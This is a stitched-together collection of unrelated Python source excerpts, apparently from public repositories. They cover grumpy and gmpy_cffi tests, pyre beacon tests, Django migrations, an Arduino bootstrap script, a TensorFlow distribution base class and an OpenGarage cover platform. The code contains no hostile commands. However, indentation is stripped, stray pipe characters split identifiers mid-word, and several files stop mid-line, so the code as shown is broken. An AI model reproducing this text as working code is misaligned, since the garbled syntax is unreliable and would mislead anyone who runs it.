self.assertEqual((0, '<b>foo</b>\n'), _GrumpRun(textwrap.dedent("""\
def bold(fn):
return lambda: '<b>' + fn() + '</b>'
@bold
def foo():
return 'foo'
print foo()""")))
def testFunctionDecoratorWithArg(self):
self.assertEqual((0, '<b id=red>foo</b>\n'), _GrumpRun(textwrap.dedent("""\
def tag(name):
def bold(fn):
return lambda: '<b id=' + name + '>' + fn() + '</b>'
return bold
@tag('red')
def foo():
return 'foo'
print foo()""")))
def testFunctionDef(self):
self.assertEqual((0, 'bar baz\n'), _GrumpRun(textwrap.dedent("""\
def foo(a, b):
print a, b
foo('bar', 'baz')""")))
def testFunctionDefGenerator(self):
self.assertEqual((0, "['foo', 'bar']\n"), _GrumpRun(textwrap.dedent("""\
def gen():
yield 'foo'
yield 'bar'
print list(gen())""")))
def testFunctionDefGeneratorReturnValue(self):
self.assertRaisesRegexp(
util.ParseError, 'returning a value in a generator function',
_ParseAndVisit, 'def foo():\n yield 1\n return 2')
def testFunctionDefLocal(self):
self.assertEqual((0, 'baz\n'), _GrumpRun(textwrap.dedent("""\
def foo():
def bar():
print 'baz'
bar()
foo()""")))
def testIf(self):
self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
if 123:
print 'foo'
if '':
print 'bar'""")))
def testIfElif(self):
self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
if True:
print 'foo'
elif False:
print 'bar'
if False:
print 'foo'
elif True:
print 'bar'""")))
def testIfElse(self): |
sn6uv/gmpy_cffi | tests/test_special_functions.py | Python | bsd-3-clause | 9,191 | 0.002176 | import sys
import pytest
from gmpy_cffi import (
log, log2, log10, exp, exp2, exp10, cos, sin, tan, sin_cos, sec, csc, cot,
acos, asin, atan, atan2, cosh, sinh, tanh, sinh_cosh, sech, csch, coth,
acosh, asinh, atanh, factorial, log1p, expm1, eint, li2, gamma, lngamma,
lgamma, digamma, zeta, erf, erfc, j0, j1, jn, y0, y1, yn, fma, fms, agm,
hypot, ai, const_log2, const_pi, const_euler, const_catalan,
mpfr, mpq, mpz, mpc)
class TestTrig(object):
def test_init_check(self):
assert log(mpfr(0.5)) == log(mpq(1, 2)) == mpfr('-0.69314718055994529')
assert log(2) == log(mpz(2)) == mpfr('0.69314718055994529')
with pyt | est.raises(TypeError):
log([])
def test_log(self):
assert log(0.5) == mpfr('-0.69314718055994529')
assert log(0.5+0.7j) == mpc('-0.15055254639196086+0.95054684081207508j')
def test_log2(self):
assert log2(0.5) == mpfr('-1.0')
def test_log10(self):
assert log10(0.5) == mpfr('-0.3010299956639812')
# assert log10(0.5+0.7j) == mpc(' | -0.065384140134511923+0.41281724775525297j')
def test_exp(self):
assert exp(0.5) == mpfr('1.6487212707001282')
assert exp(0.5+0.7j) == mpc('1.2610115829047472+1.0621354039100237j')
def test_exp2(self):
assert exp2(0.5) == mpfr('1.4142135623730951')
def test_exp10(self):
assert exp10(0.5) == mpfr('3.1622776601683795')
def test_cos(self):
assert cos(0.5) == mpfr('0.87758256189037276')
assert cos(0.5+0.7j) == mpc('1.1015144315669947-0.36368439983078849j')
def test_sin(self):
assert sin(0.5) == mpfr('0.47942553860420301')
assert sin(0.5+0.7j) == mpc('0.60176007656391672+0.66571982846862043j')
def test_tan(self):
assert tan(0.5) == mpfr('0.54630248984379048')
assert tan(0.5+0.7j) == mpc('0.31267491960977917+0.70760291160255884j')
def test_acos(self):
assert acos(0.5) == mpfr('1.0471975511965979')
assert acos(0.5+0.7j) == mpc('1.1619717971477033-0.70341059318814581j')
def test_asin(self):
assert asin(0.5) == mpfr('0.52359877559829893')
assert asin(0.5+0.7j) == mpc('0.40882452964719346+0.70341059318814581j')
def test_atan(self):
assert atan(0.5) == mpfr('0.46364760900080609')
assert atan(0.5+0.7j) == mpc('0.65821413412081531+0.55575811532302299j')
def test_sin_cos(self):
assert sin_cos(0.5) == sin_cos(mpfr(0.5)) == (sin(0.5), cos(0.5))
assert sin_cos(0) == (mpfr(0.0), mpfr(1.0))
assert sin_cos(mpq(1, 3)) == (sin(mpq(1, 3)), cos(mpq(1, 3)))
assert sin_cos(mpz(3)) == (sin(mpz(3)), cos(mpz(3)))
with pytest.raises(TypeError):
sin_cos([])
assert sin_cos(0.5+0.7j) == (
mpc('0.60176007656391672+0.66571982846862043j'),
mpc('1.1015144315669947-0.36368439983078849j'))
assert sin_cos(mpc(0.5+0.7j)) == (sin(mpc(0.5+0.7j)), cos(mpc(0.5+0.7j)))
def test_sec(self):
assert sec(0.5) == mpfr('1.139493927324549')
def test_csc(self):
assert csc(0.5) == mpfr('2.0858296429334882')
def test_cot(self):
assert cot(0.5) == mpfr('1.830487721712452')
def test_acos(self):
assert acos(0.5) == mpfr('1.0471975511965979')
assert acos(0.5+0.7j) == mpc('1.1619717971477033-0.70341059318814581j')
def test_asin(self):
assert asin(0.5) == mpfr('0.52359877559829893')
assert asin(0.5+0.7j) == mpc('0.40882452964719346+0.70341059318814581j')
def test_atan(self):
assert atan(0.5) == mpfr('0.46364760900080609')
assert atan(0.5+0.7j) == mpc('0.65821413412081531+0.55575811532302299j')
def test_atan2(self):
assert atan2(1, 2) == atan2(1.0, 2) == atan2(mpfr(1), 2) == mpfr('0.46364760900080609')
assert atan2(1.5, mpfr(3.1)) == atan2(1.5, 3.1) == mpfr('0.45066132608063364')
assert atan2(mpq(1, 2), 0.5) == atan2(0.5, mpq(1, 2)) == atan2(0.5, 0.5)
assert atan2(mpz(3), mpz(2)) == atan2(3, 2) == mpfr('0.98279372324732905')
with pytest.raises(TypeError):
atan2(1.4, [])
with pytest.raises(TypeError):
atan2([], 1.4)
def test_sinh(self):
assert sinh(0.5) == mpfr('0.52109530549374738')
assert sinh(0.5+0.7j) == mpc('0.39855567323751645+0.72643659137442362j')
def test_cosh(self):
assert cosh(0.5) == mpfr('1.1276259652063807')
assert cosh(0.5+0.7j) == mpc('0.86245590966723074+0.33569881253559997j')
def test_tanh(self):
assert tanh(0.5) == mpfr('0.46211715726000974')
assert tanh(0.5+0.7j) == mpc('0.68602943183000187+0.57526108892459082j')
def test_sinh_cosh(self):
assert sinh_cosh(0.5) == sinh_cosh(mpfr(0.5)) == (sinh(0.5), cosh(0.5))
assert sinh_cosh(0) == (mpfr(0.0), mpfr(1.0))
assert sinh_cosh(mpq(1, 3)) == (sinh(mpq(1, 3)), cosh(mpq(1, 3)))
assert sinh_cosh(mpz(3)) == (sinh(mpz(3)), cosh(mpz(3)))
with pytest.raises(TypeError):
sinh_cosh([])
def test_sech(self):
assert sech(0.5) == mpfr('0.88681888397007391')
def test_csch(self):
assert csch(0.5) == mpfr('1.9190347513349437')
def test_coth(self):
assert coth(0.5) == mpfr('2.1639534137386529')
def test_acosh(self):
assert acosh(1.5) == mpfr('0.96242365011920694')
assert acosh(0.5+0.7j) == mpc('0.70341059318814581+1.1619717971477033j')
def test_asinh(self):
assert asinh(0.5) == mpfr('0.48121182505960347')
assert asinh(0.5+0.7j) == mpc('0.58742022866413157+0.63658730712537337j')
def test_atanh(self):
assert atanh(0.5) == mpfr('0.549306144334054846')
assert atanh(0.5+0.7j) == mpc('0.32726575329597513+0.69358700031280818j')
class TestSpecial(object):
def test_factorial(self):
assert factorial(10**3) == mpfr('4.0238726007709379e+2567')
with pytest.raises(ValueError):
factorial(-3)
with pytest.raises(TypeError):
factorial(0.5)
def test_log1p(self):
assert log1p(1.4) == mpfr('0.87546873735389985')
def test_expm1(self):
assert expm1(2.4) == mpfr('10.023176380641601')
def test_eint(self):
assert eint(0.5) == mpfr('0.4542199048631736')
def test_li2(self):
assert li2(0.5) == mpfr('0.58224052646501245')
def test_gamma(self):
assert gamma(0.5) == mpfr('1.7724538509055161')
def test_lngamma(self):
assert lngamma(0.5) == mpfr('0.57236494292470008')
def test_lgamma(self):
assert lgamma(0.5) == (mpfr('0.57236494292470008'), 1)
assert lgamma(-0.0) == (mpfr('inf'), -1)
def test_digamma(self):
assert digamma(0.5) == mpfr('-1.9635100260214235')
def test_zeta(self):
assert zeta(0.5) == mpfr('-1.4603545088095868')
def test_erf(self):
assert erf(0.5) == mpfr('0.52049987781304652')
def test_erfc(self):
assert erfc(0.5) == mpfr('0.47950012218695348')
def test_j0(self):
assert j0(0.5) == mpfr('0.93846980724081286')
def test_j1(self):
assert j1(0.5) == mpfr('0.2422684576748739')
def test_jn(self):
assert jn(0.5, 4) == mpfr('0.00016073647636428759')
with pytest.raises(TypeError):
jn(0.5, sys.maxsize+1)
with pytest.raises(TypeError):
jn(0.5, -sys.maxsize-2)
def test_y0(self):
assert y0(0.5) == mpfr('-0.44451873350670656')
def test_y1(self):
assert y1(0.5) == mpfr('-1.4714723926702431')
def test_yn(self):
assert yn(0.5, 4) == mpfr('-499.27256081951231')
with pytest.raises(TypeError):
yn(0.5, sys.maxsize+1)
with pytest.raises(TypeError):
yn(0.5, -sys.maxsize-2)
def test_fma(self):
assert fma(0.5, 0.7, 1.1) == mpfr('1.4500000000000002')
assert fma(3, 1, 0.5+0.1j) == mpc('3.5+0.10000000000000001j')
def test_fms(self):
assert fms(0.5, 0.7, 1.1) == mpfr('-0.75000000000000011')
assert fms(0.5, mpfr(0.7), 1.1) == mpfr('-0.75000000000000011')
assert fms(0.5, 0.7, mpfr( |
zeromq/pyre | tests/test_zbeacon.py | Python | lgpl-3.0 | 2,243 | 0.002675 | import unittest
import zmq
import struct
import uuid
import socket
from pyre.zactor import ZActor
from pyre.zbeacon import ZBeacon
class ZBeaconTest(unittest.TestCase):
def setUp(self, *args, **kwargs):
ctx = zmq.Context()
ctx = zmq.Context()
# two beacon frames
self.transmit1 = struct.pack('cccb16sH', b'Z', b'R', b'E',
1, uuid.uuid4().bytes,
socket.htons(9999))
self.transmit2 = struct.pack('cccb16sH', b'Z', b'R', b'E',
1, uuid.uuid4().bytes,
socket.htons(9999))
self.node1 = ZActor(ctx, ZBeacon)
self.node1.send_unicode("VERBOSE")
self.node1.send_unicode("CONFIGURE", zmq.SNDMORE)
self.node1.send(struct.pack("I", 9999))
print("Hostname 1:", self.node1.recv_unicode())
self.node2 = ZActor(ctx, ZBeacon)
self.node2.send_unicode("VERBOSE")
self.node2.send_unicode("CONFIGURE", zmq.SNDMORE)
self.node2.send(struct.pack("I", 9999))
print("Hostname 2:", self.node2.recv_unicode())
# end setUp
def tearDown(self):
self.node1.destroy()
self.node2.destr | oy()
# end tearDown
def test_node1(self):
self.node1.send_unicode("PUBLISH", zmq.SNDMORE)
self.node1.send(self.transmit1)
def test_node2(self):
self.node2.send_unicode("PUBLISH", zmq.SNDMORE)
self.node2.send(self.transmit2)
def test_recv_beacon1(self):
self.node1.send_unicode("PUBLISH", zmq.SNDMORE)
self.node1.send(self.transmit1)
self.node2.send_unicode("PUBLISH", zmq.SNDMORE)
self.node2.send(self.transmit2)
| req = self.node1.recv_multipart()
self.assertEqual(self.transmit2, req[1])
def test_recv_beacon2(self):
self.node1.send_unicode("PUBLISH", zmq.SNDMORE)
self.node1.send(self.transmit1)
self.node2.send_unicode("PUBLISH", zmq.SNDMORE)
self.node2.send(self.transmit2)
req = self.node2.recv_multipart()
self.assertEqual(self.transmit1, req[1])
# end ZBeaconTest
if __name__ == '__main__':
try:
unittest.main()
except Exception as a:
print(a)
|
nino-c/plerp.org | src/portfolio/migrations/0012_canvasappportfolioitem_appname.py | Python | mit | 431 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class | Migration(migrations.Migration):
dependencies = [
('portfolio', '0011_auto_20160115_0105'),
]
operations = [
migrations.AddField(
model_name='canvasappportfolioitem',
name='appname',
field=models.CharField(max_length=100, | null=True),
),
]
|
aphelps/HMTL | python/Bootstrap.py | Python | mit | 3,352 | 0.002685 | #!/usr/bin/python
#
# Bootstrap script for a new device. This uploads a configuration and installs
# the Bringup sketch.
#
import sys
import os
import argparse
import subprocess
import hmtl.portscan as portscan
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", dest="config",
required=True,
help="JSON configuration file")
parser.add_argument("-d", "--device", dest="device",
he | lp="Arduino USB device")
parser.add_argument("-i", "--deviceid", dest="deviceid",
required=True,
help="Device ID to configure")
parser.add_argument("-a", "--address", dest="address",
help="Address to configure (defaults to device ID)")
parser.add_argument("-t", "--type", dest="type",
default="nano",
| help="Device type for platformio scripts (nano, mini, uno, moteinomega, etc) [%(default)s)]")
parser.add_argument("-s", "--stages", dest="stages",
default="1,2,3",
help="Stages to execute [%(default)s]")
parser.add_argument("--module", dest="module",
default=False, action='store_true',
help="Initially load module code")
options = parser.parse_args()
if options.device == None:
options.device = portscan.choose_port()
return options
def main():
options = parse_args()
if not os.path.exists(options.config):
print("Config file %s does not exist" % options.config)
sys.exit(1)
config_path = os.path.abspath(options.config)
if not options.deviceid:
print("Must specify a device ID")
sys.exit(1)
if not options.address:
options.address = options.deviceid
stages = [int(x) for x in options.stages.split(",")]
platformio_cmd = ["platformio", "run", "-t", "upload", "-e",
"%s" % options.type]
if 1 in stages:
# Upload the python configuration sketch
os.chdir("/Users/amp/Dropbox/Arduino/HMTL/platformio/HMTLPythonConfig")
print("Executing: %s cwd:%s" % (platformio_cmd, os.getcwd()))
ret = subprocess.call(platformio_cmd)
if ret != 0:
print("Uploading configuration sketch failed: %s" % ret)
sys.exit(1)
if 2 in stages:
# Upload a configuration
command = "HMTLConfig -f %s -i %s -a %s -v -w -d %s" % \
(config_path, options.deviceid, options.address, options.device)
print("Executing: %s" % command)
ret = os.system(command)
#ret = subprocess.call(command)
if ret != 0:
print("HMTLConfig call failed: %s" % ret)
sys.exit(1)
if 3 in stages:
# Upload the initial sketch
if options.module:
sketch="/Users/amp/Dropbox/Arduino/HMTL/platformio/HMTL_Module"
else:
sketch="/Users/amp/Dropbox/Arduino/HMTL/platformio/HMTL_Bringup"
os.chdir(sketch)
print("Executing: %s cwd:%s" % (platformio_cmd, os.getcwd()))
ret = subprocess.call(platformio_cmd)
if ret != 0:
print("Uploading bringup sketch failed: %s" % ret)
sys.exit(1)
main() |
laosiaudi/tensorflow | tensorflow/contrib/distributions/python/ops/distribution.py | Python | apache-2.0 | 33,964 | 0.005565 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base classes for probability distributions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import contextlib
import inspect
import types
import warnings
import numpy as np
import six
from tensorflow.contrib import framework as contrib_framework
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
_DISTRIBUTION_PUBLIC_METHOD_WRAPPERS = [
"batch_shape", "get_batch_shape", "event_shape", "get_event_shape",
"sample_n", "log_prob", "prob", "log_cdf", "cdf", "log_survival_function",
"survival_function", "entropy", "mean", "variance", "std", "mode"]
@six.add_metaclass(abc.ABCMeta)
class _BaseDistribution(object):
"""Abstract base class needed for resolving subclass hierarchy."""
pass
def _copy_fn(fn):
"""Create a deep copy of fn.
Args:
fn: a callable
Returns:
A `FunctionType`: a deep copy of fn.
Raises:
TypeError: if `fn` is not a callable.
"""
if not callable(fn):
raise TypeError("fn is not callable: %s" % fn)
# The blessed way to copy a function. copy.deepcopy fails to create
# a non-reference copy. Since:
# types.FunctionType == type(lambda: None),
# and the docstring for the function type states:
#
# function(code, globals[, name[, argdefs[, closure]]])
#
# Create a function object from a code object and a dictionary.
# ...
#
# Here we can use this to create a new function with the old function's
# code, globals, closure, etc.
return types.FunctionType(
code=fn.__code__, globals=fn.__globals__,
name=fn.__name__, argdefs=fn.__defaults__,
closure=fn.__closure__)
def _update_docstring(old_str, append_str):
"""Update old_str by inserting append_str just before the "Args:" section."""
old_str_lines = old_str.split("\n")
# Step 0: Prepend spaces to all lines of append_str. This is
# necessary for correct markdown generation.
append_str = "\n".join(" %s" % line for line in append_str.split("\n"))
# Step 1: Find mention of "Args":
has_args_ix = [
ix for ix, line in enumerate(old_str_lines)
if line.strip().lower() == "args:"]
if has_args_ix:
final_args_ix = has_args_ix[-1]
return ("\n".join(old_str_lines[:final_args_ix])
+ "\n\n" + append_str + "\n\n"
+ "\n".join(old_str_lines[final_args_ix:]))
else:
return old_str + "\n\n" + append_str
class _DistributionMeta(abc.ABCMeta):
def __new__(mcs, classname, baseclasses, attrs):
"""Control the creation of subclasses of the Distribution class.
The main purpose of this method is to properly propagate docstrings
from private Distribution methods, like `_log_prob`, into their
public wrappers as inherited by the Distribution base class
(e.g. `log_prob`).
Args:
classname: The name of the subclass being created.
baseclasses: A tuple of parent classes.
attrs: A dict mapping new attributes to their values.
Returns:
The class object.
Raises:
TypeError: If `Distribution` is not a subclass of `BaseDistribution`, or
the new class is derived via multiple inheritance and the first
parent class is not a subclass of `BaseDistribution`.
AttributeError: If `Distribution` does not implement e.g. `log_prob`.
ValueError: If a `Distribution` public method lacks a docstring.
"""
if not baseclasses: # Nothing to be done for Distribution
raise TypeError("Expected non-empty baseclass. Does Distribution "
"not subclass _BaseDistribution?")
which_base = [
base for base in baseclasses
if base == _BaseDistribution or issubclass(base, Distribution)]
base = which_base[0]
if base == _BaseDistribution: # Nothing to be done for Distribution
return abc.ABCMeta.__new__(mcs, classname, baseclasses, attrs)
if not issubclass(base, Distribution):
raise TypeError("First parent class declared for %s must be "
"Distribution, but saw '%s'" % (classname, base.__name__))
for attr in _DISTRIBUTION_PUBLIC_METHOD_WRAPPERS:
special_attr = "_%s" % attr
class_attr_value = attrs.get(attr, None)
if attr in attrs:
# The method is being overridden, do not update its docstring
continue
base_attr_value = getattr(base, attr, None)
if not base_attr_value:
raise AttributeError(
"Internal error: expected base class '%s' to implement method '%s'"
% (base.__name__, attr))
class_special_attr_value = attrs.get(special_attr, None)
if class_special_attr_value is None:
# No _special method available, no need to update the docstring.
continue
class_special_attr_docstring = inspect.getdoc(class_special_attr_value)
if not class_special_attr_docstring:
# No docstring to append.
continue
class_attr_value = _copy_fn(base_attr_value)
class_attr_docstring = inspect.getdoc(base_attr_value)
if class_attr_docstring is None:
raise ValueError(
"Expected base class fn to contain a docstring: %s.%s"
| % (base.__name__, attr))
class_attr_value.__doc__ = _update_docstring(
class_attr_value.__doc__,
("Additional documentation from `%s`:\n\n%s"
% (classname, class_special_attr_docstring)))
attrs[attr] = class_attr_value
return abc | .ABCMeta.__new__(mcs, classname, baseclasses, attrs)
@six.add_metaclass(_DistributionMeta)
class Distribution(_BaseDistribution):
"""A generic probability distribution base class.
`Distribution` is a base class for constructing and organizing properties
(e.g., mean, variance) of random variables (e.g, Bernoulli, Gaussian).
### Subclassing
Subclasses are expected to implement a leading-underscore version of the
same-named function. The argument signature should be identical except for
the omission of `name="..."`. For example, to enable `log_prob(value,
name="log_prob")` a subclass should implement `_log_prob(value)`.
Subclasses can append to public-level docstrings by providing
docstrings for their method specializations. For example:
```python
@distribution_util.AppendDocstring("Some other details.")
def _log_prob(self, value):
...
```
would add the string "Some other details." to the `log_prob` function
docstring. This is implemented as a simple decorator to avoid python
linter complaining about missing Args/Returns/Raises sections in the
partial docstrings.
### Broadcasting, batching, and shapes
All distributions support batches of independent distributions of that type.
The batch shape is determined by broadcasting together the parameters.
The shape of arguments to `__init__`, `cdf`, `log_cdf`, `prob`, and
`log_prob` reflect this broadcasting, as does the return value of `sample` and
`sample_n`.
`sample_n_shape = (n,) + batch_shape + event_shape`, where `sample_n_shape` is
the shape of the `Tensor` returned from `sample_n`, `n` is the number of
samples, `batch_shape` defines how many independent distributions there ar |
jgmize/tulsawebdevs.org | talks/migrations/0003_auto_20150816_2148.py | Python | gpl-3.0 | 722 | 0.00277 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django_extensions.db.fields
class Migration(migrations.Migration):
dependencies = [
('talks', '0002_auto_20150808_2108'),
]
operations = [
migrations.AlterField(
model_name='speaker',
name='slug',
field=django_extensions.db.fields.AutoSlugField(verbose_name='Slug', blank=True, populate_from='get_name', editable=False),
),
| migrations.AlterField(
model_name='talk',
name='speaker',
field=models.ForeignKey( | null=True, blank=True, related_name='talks', to='talks.Speaker'),
),
]
|
GooseDad/Test | riding_forecast.py | Python | apache-2.0 | 8,045 | 0.00087 | import csv
import datetime
from scipy.stats import norm
from regional_poll_interpolator import RegionalPollInterpolator
import riding_poll_model
party_long_names = {
'cpc': 'Conservative/Conservateur',
'lpc': 'Liberal/Lib',
'ndp': 'NDP-New Democratic Party/NPD-Nouveau Parti d',
'gpc': 'Green Party/Parti Vert',
'bq': 'Bloc Qu',
'oth': 'Independent',
}
province_to_region = {
'Newfoundland and Labrador': 'ATL',
'Prince Edward Island': 'ATL',
'Nova Scotia': 'ATL',
'New Brunswick': 'ATL',
'Quebec': 'QC',
'Ontario': 'ON',
'Manitoba': 'SK_MB',
'Saskatchewan': 'SK_MB',
'Alberta': 'AB',
'British Columbia': 'BC',
'Yukon': 'Canada',
'Northwest Territories': 'Canada',
'Nunavut': 'Canada',
}
province_abbreviations = {
'Newfoundland and Labrador': 'NL',
'Prince Edward Island': 'PE',
'Nova Scotia': 'NS',
'New Brunswick': 'NB',
'Quebec': 'QC',
'Ontario': 'ON',
'Manitoba': 'MB',
'Saskatchewan': 'SK',
'Alberta': 'AB',
'British Columbia': 'BC',
'Yukon': 'YT',
'Northwest Territories': 'NT',
'Nunavut': 'NU',
}
provinces_by_numeric_code = {
'10': 'NL',
'11': 'PE',
'12': 'NS',
'13': 'NB',
'24': 'QC',
'35': 'ON',
'46': 'MB',
'47': 'SK',
'48': 'AB',
'59': 'BC',
'60': 'YT',
'61': 'NT',
'62': 'NU',
}
def WhichParty(s):
"""If the given string contains a party name, return its abbreviation."""
for abbreviation, long_name in party_long_names.items():
if long_name in s:
return abbreviation
return None
def WhichRegion(s):
"""If the given string contains a province name, return its region code."""
for province, region in province_to_region.items():
if province in s:
return region
return None
def WhichProvince(s):
"""If the given string contains a province name, return its short form."""
for province, abbr in province_abbreviations.items():
if province in s:
return abbr
return None
def NormalizeDictVector(d):
"""Adjusts numerical values so they add up to 1."""
normalized = {}
divisor = sum(d.values())
for key in d:
normalized[key] = d[key] / divisor
return normalized
def KeyWithHighestValue(d, forbidden_keys=[]):
"""Return the key with the highest value.
Optionally, a list of forbidden keys can be provided. If so, the function
will return the key with the next-highest value, but which is not
forbidden.
"""
mv = -1
mk = None
for k, v in d.items():
if k in forbidden_keys:
continue
if v > mv:
mk = k
mv = v
return mk
# Load regional polling data.
interpolator = RegionalPollInterpolator()
interpolator.LoadFromCsv('regional_poll_averages.csv')
interpolator.LoadFromCsv('regional_baseline.csv')
baseline_date = datetime.datetime(2011, 5, 2)
# Load and process per-riding election results from 2011.
old_ridings = {}
with open('table_tableau12.csv') as csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
riding_name = row['Electoral District Name/Nom de circonscription']
riding_number = row['Electoral District Number']
popular_vote = float(row['Percentage of Votes Obtained'])
party = WhichParty(row['Candidate/Candidat'])
if not party:
continue
province = WhichProvince(row['Province'])
region = WhichRegion(row['Province'])
assert region
before = interpolator.Interpolate(region, party, baseline_date)
after = interpolator.GetMostRecent(region, party)
if before > 2: # As in 2% not 200%
projected_gain = after / before
else:
projected_gain = 1
projection = popular_vote * projected_gain
if not riding_number in old_ridings:
old_ridings[riding_number] = {
'2011': {}, 'projections': {},
'name': riding_name,
'number': riding_number,
'province': province}
r = old_ridings[riding_number]
r['2011'][party] = popular_vote
r['projections'][party] = projection
# Calculate the transposition from old ridings (2003) to new ridings (2013).
new_ridings = {}
with open('TRANSPOSITION_338FED.csv') as csv_file:
# Skip the first few lines of the file, to get to the data part.
for i in range(4):
next(csv_file)
reader = csv.DictReader(csv_file)
for row in reader:
new_riding_number = row['2013 FED Number']
if not new_riding_number:
continue
new_riding_name = row['2013 FED Name']
old_riding_number = row['2003 FED Number from which the 2013 ' +
'FED Number is constituted']
prov_num_code = row['Province and territory numeric code']
province = provinces_by_numeric_code[prov_num_code]
assert province
population_2013 = float(row['2013 FED - Population'])
population_transferred = float(
row['Population transferred to 2013 FED'])
population_percent = population_transferred / population_2013
all_votes = row['All votes']
electors = row['Electors on lists']
if new_riding_number not in new_ridings:
new_ridings[new_riding_number] = {
'name': new_riding_name,
'number': new_riding_number,
'province': province,
'feeders': {},
'total_votes_2011': 0,
'total_electors_2011': 0,
'population': int(population_2013)}
r = new_ridings[new_riding_number]
r['feeders'][old_riding_number] = population_percent
r['total_votes_2011'] += int(all_votes)
r['total_electors_2011'] += int(electors)
# Output final stats for each riding.
party_order = ['cpc', 'ndp', 'lpc', 'gpc', 'bq', 'oth']
readable_party_names = {
'cpc': 'CON',
'lpc': 'LIB',
'ndp': 'NDP',
'gpc': 'GRN',
'bq': 'BQ',
'oth': 'OTH',
}
with open('riding_forecasts.csv', 'wb') as csv_file:
csv_writer = csv.writer(csv_file)
csv_writer.writerow(
['province', 'name', 'number,'] +
[readable_party_names[p].lower() for p in party_order] +
['projected_winner', 'strategic_vote', 'confidence', 'turnout_2011'])
for r in new_ridings.values():
projections = {}
riding_name = r['name']
riding_number = str(r['number'])
province = r['province']
# Project this riding by mixing old-riding projections.
fo | r feeder_number, weight in r['feeders'].items():
| feeder = old_ridings[feeder_number]
normalized = NormalizeDictVector(feeder['projections'])
for party, support in normalized.items():
if party not in projections:
projections[party] = 0
projections[party] += support * weight
# Upgrade the projections for ridings that have local polling data.
projections = riding_poll_model.projections_by_riding_number.get(
riding_number, projections)
ordered_projections = [projections.get(p, 0) for p in party_order]
projected_winner = KeyWithHighestValue(projections)
runner_up = KeyWithHighestValue(projections, [projected_winner])
strategic_vote = KeyWithHighestValue(projections, ['cpc'])
gap = projections[projected_winner] - projections[runner_up]
projected_winner = readable_party_names[projected_winner]
strategic_vote = readable_party_names[strategic_vote]
confidence = norm.cdf(gap / 0.25)
turnout = float(r['total_votes_2011']) / r['total_electors_2011']
csv_writer.writerow([province, riding_name, riding_number] +
ordered_projections +
[projected_winner, strategic_vote, confidence,
turnout])
|
xloc/SwimmingPool | Questions Submit/Q1/Q1_xiong.py | Python | unlicense | 189 | 0.031746 | workhour=input('enter work hour:')
workra | te=input('enter work rate:')
if workhour>40:
pay=40*workrate+(workhour-40)*workrate*1.5
else:
pay=workhour*workrate
print 'pay:', | pay
|
rbtcollins/lmirror | l_mirror/tests/logging_resource.py | Python | gpl-3.0 | 2,057 | 0.004861 | #
# LMirror is Copyright (C) 2010 Robert Collins <robertc@robertcollins.net>
#
# LMirror is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/ | licenses/>.
#
# In the LMirror source tree the file COPYING.txt contains the GNU General Public
# License version 3.
#
"""A test resource to provide isolation for the logging module (sigh, globals)."""
__all__ = ['LoggingResourceManager']
import logging
from testresources import TestResourceManager
from l_mirror.tests.monkeypatch import mon | keypatch
class OldState:
def __init__(self, restore_functions):
self.restore_functions = restore_functions
def tearDown(self):
for fn in self.restore_functions:
fn()
class LoggingResourceManager(TestResourceManager):
    """A resource that isolates global logging-module state around a test.

    ``make`` swaps in a fresh root logger and logger manager via
    monkeypatching; ``clean`` undoes the patches.
    """
    def __getattribute__(self, attr):
        # Report the manager itself as always dirty so the resource is
        # rebuilt/cleaned for every test.  NOTE(review): presumably
        # testresources reads a ``_dirty`` attribute internally -- confirm
        # against the testresources implementation.
        if attr == '_dirty':
            return True
        return object.__getattribute__(self, attr)
    def make(self, dep_resources):
        # Build a fresh root logger and manager, isolated from the process
        # globals that other tests (or the code under test) may mutate.
        new_root = logging.RootLogger(logging.WARNING)
        new_manager = logging.Manager(new_root)
        # Pretend the "no handlers could be found" warning was already
        # emitted, so tests do not print it to stderr.
        new_manager.emittedNoHandlerWarning = 1
        # OldState carries the un-patch callables; clean() runs them.
        return OldState([monkeypatch('logging.root', new_root),
            monkeypatch('logging.Logger.root', new_root),
            monkeypatch('logging.Logger.manager', new_manager)])
    def isDirty(self):
        # Always dirty: any test may have mutated global logging state.
        return True
    def clean(self, resource):
        # Restore the original logging globals captured by make().
        resource.tearDown()
|
JshWright/home-assistant | homeassistant/components/cover/opengarage.py | Python | apache-2.0 | 6,089 | 0 | """
Platform for the opengarage.io cover component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/cover.opengarage/
"""
import logging
import voluptuous as vol
import requests
from homeassistant.components.cover import (
CoverDevice, PLATFORM_SCHEMA, SUPPORT_OPEN, SUPPORT_CLOSE)
from homeassistant.const import (
CONF_DEVICE, CONF_NAME, STATE_UNKNOWN, STATE_CLOSED, STATE_OPEN,
CONF_COVERS, CONF_HOST, CONF_PORT)
import homeassistant.helpers.config_validation as cv
DEFAULT_NAME = 'OpenGarage'
DEFAULT_PORT = 80
CONF_DEVICEKEY = "device_key"
ATTR_SIGNAL_STRENGTH = "wifi_signal"
ATTR_DISTANCE_SENSOR = "distance_sensor"
ATTR_DOOR_STATE = "door_state"
STATE_OPENING = "opening"
